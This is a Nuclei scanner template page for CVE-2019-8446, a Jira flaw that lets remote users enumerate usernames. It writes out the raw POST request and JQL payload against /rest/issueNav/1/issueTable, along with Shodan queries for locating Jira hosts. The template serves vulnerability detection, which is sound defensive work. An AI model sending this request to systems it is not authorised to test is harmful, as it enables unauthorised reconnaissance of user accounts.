Skip to content
Nuclei Templates

Jira Improper Authorization

ID: CVE-2019-8446

Severity: medium

Author: dhiyaneshDk

Tags: cve,cve2019,jira,atlassian

Description

Section titled “Description”

The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.

YAML Source

Section titled “YAML Source”
id: CVE-2019-8446


info:
  name: Jira Improper Authorization
  author: dhiyaneshDk
  severity: medium
  description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.
  impact: |
    This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Jira application.
  remediation: |
    Apply the latest security patches and updates provided by Atlassian to fix the vulnerability.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-69777
    - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/CyberTrashPanda/CVE-2019-8446
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-8446
    cwe-id: CWE-863
    epss-score: 0.15691
    epss-percentile: 0.95925
    cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira_server
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve,cve2019,jira,atlassian


http:
  - raw:
      - |
        POST /rest/issueNav/1/issueTable HTTP/1.1
        Host: {{Hostname}}
        Connection: Close
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        X-Atlassian-Token: no-check
        Accept-Encoding: gzip, deflate
        Accept-Language: en-US,en;q=0.9


        {'jql':'project in projectsLeadByUser("{{randstr}}")'}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "the user does not exist"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d5d46349a93fd0b9fd8b476fcef9481bc48e7862cda5e142d887d625148dd525022100efadeed2647b4240868b7a85cef37fbb2f5850c3e9d86c6b981cb8cbff6da7cb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-8446.yaml"

View on Github